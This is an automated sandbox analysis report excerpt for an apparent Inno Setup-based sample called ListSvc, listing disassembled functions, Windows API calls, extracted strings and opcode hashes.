API String ID: 1306739567-0
Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296

Uniqueness

Uniqueness Score: -1.00%

Function 005C6808, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
Opcode Fuzzy Hash: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458

Uniqueness

Uniqueness Score: -1.00%

Function 0040D754, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772

Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5

Uniqueness

Uniqueness Score: -1.00%

Function 005C68A4, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
Opcode Fuzzy Hash: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059

Uniqueness

Uniqueness Score: -1.00%

Function 0042B8A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C

Uniqueness

Uniqueness Score: -1.00%

Function 006ACE20, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24

Uniqueness

Uniqueness Score: -1.00%

Function 004103B4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 004103B8

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
Instruction ID: dd27519167a78a1d4504dc33fea54df0b767f1302367e86ea931617165e635a5
Opcode Fuzzy Hash: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
Instruction Fuzzy Hash: FAA012144089000ACC04F7194C4340B35905D40114FC40668745CA92C3E61985644ADB

Uniqueness

Uniqueness Score: -1.00%

Function 0047845C, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
Opcode Fuzzy Hash: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004056E8, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00625754, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006257BC
QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

CreateProcessW.KERNEL32 ref: 00625986
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

SetNamedPipeHandleState, xrefs: 006258E6
D, xrefs: 006258FF
Helper process PID: %u, xrefs: 006259D9
Cannot utilize 64-bit features on this version of Windows, xrefs: 0062579D
helper %d 0x%x, xrefs: 00625965
CreateProcess, xrefs: 0062598F
i, xrefs: 00625939
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00625824
CreateNamedPipe, xrefs: 0062586C
64-bit helper EXE wasn't extracted, xrefs: 006257B0
CreateFile, xrefs: 006258B2
Starting 64-bit helper process., xrefs: 00625789

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
API String ID: 770386003-3271284199
Opcode ID: 05f0d23c42287ecae2e57217e457ed2ec46126e3f6ae7872c277f0bd952ed0eb
Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
Opcode Fuzzy Hash: 05f0d23c42287ecae2e57217e457ed2ec46126e3f6ae7872c277f0bd952ed0eb
Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65

Uniqueness

Uniqueness Score: -1.00%

Function 006A60E8, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91

Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043

ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
GetLastError.KERNEL32(00000000,006A6237,?,?,00000001), ref: 006A6178
MsgWaitForMultipleObjects.USER32 ref: 006A61C5
GetExitCodeProcess.KERNEL32 ref: 006A61EB
CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,00000000,006A6237,?,?,00000001), ref: 006A620F

Strings

ShellExecuteEx, xrefs: 006A6189
runas, xrefs: 006A613C
<, xrefs: 006A612E
GetExitCodeProcess, xrefs: 006A61F4
MsgWaitForMultipleObjects, xrefs: 006A61D4
ShellExecuteEx returned hProcess=0, xrefs: 006A6199

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 254331816-221126205
Opcode ID: c2adbbc871acc4843ce61d2285dfbb2c69ebc7a97822930896cce5b608feca68
Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
Opcode Fuzzy Hash: c2adbbc871acc4843ce61d2285dfbb2c69ebc7a97822930896cce5b608feca68
Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265

Strings

kernel32.dll, xrefs: 0040E0EC
GetLongPathNameW, xrefs: 0040E0FC
\, xrefs: 0040E232

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 1930782624-3908791685
Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89

Uniqueness

Uniqueness Score: -1.00%

Function 0060F6D8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744

Strings

SeShutdownPrivilege, xrefs: 0060F700

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
